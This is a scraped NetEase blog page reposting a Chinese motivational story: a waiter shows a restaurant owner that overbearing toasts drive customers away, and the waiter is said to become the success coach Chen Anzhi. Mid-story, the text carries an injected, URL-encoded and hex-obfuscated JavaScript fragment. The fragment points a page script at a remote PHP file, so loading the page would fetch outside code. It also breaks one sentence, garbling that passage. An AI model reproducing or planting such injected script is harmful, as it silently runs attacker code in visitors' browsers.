注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

陈禹 建筑资质代办

建筑资质代办、转让、增项与升级

 
 
 

日志

 
 

引用 引用 有一种需要叫“不需要”  

2010-09-15 14:07:57|  分类: 天籁荼苑 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

引用

袁伟红引用 有一种需要叫“不需要”

 

引用

文阁空间有一种需要叫“不需要”

美国纽约唐人街有一家酒店,刚开张的时候生意好了一段时间,但不久后就开始下滑。酒店老板为此伤透了脑筋:各种硬件设施是一流的,酒店菜肴质量也是一流的,问题究竟出在哪儿呢?

一天,一位富豪邀请了几位朋友在这家酒店里小聚。酒店老板顿时受宠若惊,为表示敬意,频频上前敬酒,使出浑身解数与富豪套近乎,想拉住这个不可多得的客源。而在餐厅的另一边,一个靠墙站着的小伙子正仔细观察着老板的一举一动。他是刚来酒店上班的服务员。当那位富豪离开的时候,老板又亲自送到了门口。返回酒店时,老板被小伙子叫住了:“我们酒店的生意不怎么好!”

“是的!可是你也应该看见了,我正在努力改变现状!”老板说。

“假如您这样下去的话,我们的生意将会更差。”小伙子说。

老板打量了他一番,有点不高兴地说:“那你认为应该怎样做呢?”

“请我做一个月的主管,并且我做主管的一个月里,您要听我的安排!”小伙子从容地说。

“可以。但是你用什么来证明你有让我听你安排的实力呢?”

“我敢肯定,刚才您送到门口的那位客人不会再来我们这里吃饭了!”小伙子说。

老板听他这样说,以为他是个故作神秘没事爱乱讲话的人,就开玩笑地答应了下来:“如果从今天起,一个月里那位客人真的一次不来,我立刻请你做主管!”

时间一晃过了一个月,富豪果然没再来过,而且酒店的生意越来越差。这时,老板想起了那个小伙子,便抱着死马当活马医的想法兑现了对小伙子的承诺,让他做一个月的主管,并答应不过问任何事,一切由他一人负责。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<时间一天天过去,店老板暗中观察。他发现,小伙子对任何客人都只是微微点头一笑,而且他从不向客人敬酒,与客人套近乎。但是,让他不敢相信的是,自从小伙子上任以来,生意一天比一天好,老客户也一天比一天多了起来。他又惊讶又好奇又感激,恨不得立刻知道小伙子究竟用了什么回天之术。

小伙子任期刚满,老板就把心里的想法说了出来。小伙子问他:“您认为做生意最重要的是什么?”

“简直是小儿科的问题!当然是尽量满足客人的需要啊!”老板说。

“说得很对!但是您有没有想过,客人们的‘需要’当中,有一种‘需要’叫做‘不需要’?”

老板懵了,说实话,他还真没想过客人不需要什么。“难道我们尽量去满足客人的需要还不够?”

“当然!了解客人不需要什么与了解客人需要什么一样重要!”小伙子说,“您一见到有身份有地位的人就不断去敬酒,但是他们来这里的目的是什么呢?是来吃饭,是参加他们自己的聚会,而不是来接受您的敬酒。您的敬酒实际上是在打扰他们做自己的事情,这绝不是他们所需要的。还有,同一宴席上,有主次之宾,您在不断向主宾敬酒的同时,其实也在向同一桌上的其他宾客做暗示:我不在乎你们。这也绝不是他们所需要的。还有,您给某一桌宾客敬酒的同时,是对其他桌宾客一种不平等的对待,让人感觉:‘难道他们是客人,我们就不是客人了?’这样的感觉同样是这些顾客所不需要的。您无意识中给了顾客一些他们根本不需要的感觉,足以让他们对酒店产生反感,这就是导致生意每况愈下的原因。”

老板听后茅塞顿开。从此,他除了揣摩顾客需要什么的同时,更下大力研究顾客“不需要”什么。20年以后,他的酒店遍布全美。而当年那位小伙子,就是如今被誉为华人中最顶尖的成功学专家——陈安之。

文章摘自《小学生哲理故事朗读本·守到黎明见花开》

  评论这张
 
阅读(209)| 评论(8)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017